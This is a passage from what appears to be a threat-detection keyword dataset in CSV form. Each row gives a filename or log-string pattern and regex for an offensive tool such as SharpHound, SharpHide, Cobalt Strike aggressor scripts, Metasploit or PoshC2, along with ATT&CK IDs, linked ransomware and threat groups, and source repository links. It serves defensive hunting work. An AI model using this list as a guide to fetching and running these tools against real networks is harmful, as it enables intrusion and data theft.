tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","59001" "*SharpHandler.exe*",".{0,1000}SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59002" "*SharpHide running as elevated user*",".{0,1000}SharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59003" "*SharpHide.csproj*",".{0,1000}SharpHide\.csproj.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59004" "*SharpHide.exe*",".{0,1000}SharpHide\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59005" 
"*SharpHide.sln*",".{0,1000}SharpHide\.sln.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59006" "*SharpHide-master*",".{0,1000}SharpHide\-master.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","59007" "*SharpHide-N*.exe*",".{0,1000}SharpHide\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59008" "*SharpHose.exe*",".{0,1000}SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59009" "*sharphound -*",".{0,1000}sharphound\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59010" "*SharpHound completed {Number} loops!*",".{0,1000}SharpHound\scompleted\s\{Number\}\sloops!.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59011" "*SharpHound Enumeration Completed at *",".{0,1000}SharpHound\sEnumeration\sCompleted\sat\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59012" "*SharpHound Enumeration Completed at *",".{0,1000}SharpHound\sEnumeration\sCompleted\sat\s.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59013" "*SharpHound-*.zip*",".{0,1000}SharpHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat 
- ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59014" "*sharphound*--stealth*",".{0,1000}sharphound.{0,1000}\-\-stealth.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59015" "*sharphound.*",".{0,1000}sharphound\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59016" "*SharpHound.cna*",".{0,1000}SharpHound\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59017" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","59018" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59019" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59020" "*sharphound.exe*",".{0,1000}sharphound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","59021" 
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59022" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59023" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59024" 
"*Sharphound.Program*",".{0,1000}Sharphound\.Program.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59025" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","59026" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - 
CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59027" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59028" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","59029" "*sharphound.ps1*",".{0,1000}sharphound\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59030" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - 
UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59031" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59032" "*Sharphound.Runtime*",".{0,1000}Sharphound\.Runtime.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59033" "*SharpHound/releases/download/*",".{0,1000}SharpHound\/releases\/download\/.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59034" 
"*SharpHound2*",".{0,1000}SharpHound2.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59035" "*Sharphound2.*",".{0,1000}Sharphound2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59036" "*SharpHound3*",".{0,1000}SharpHound3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59037" "*Sharphound-Aggressor*",".{0,1000}Sharphound\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt 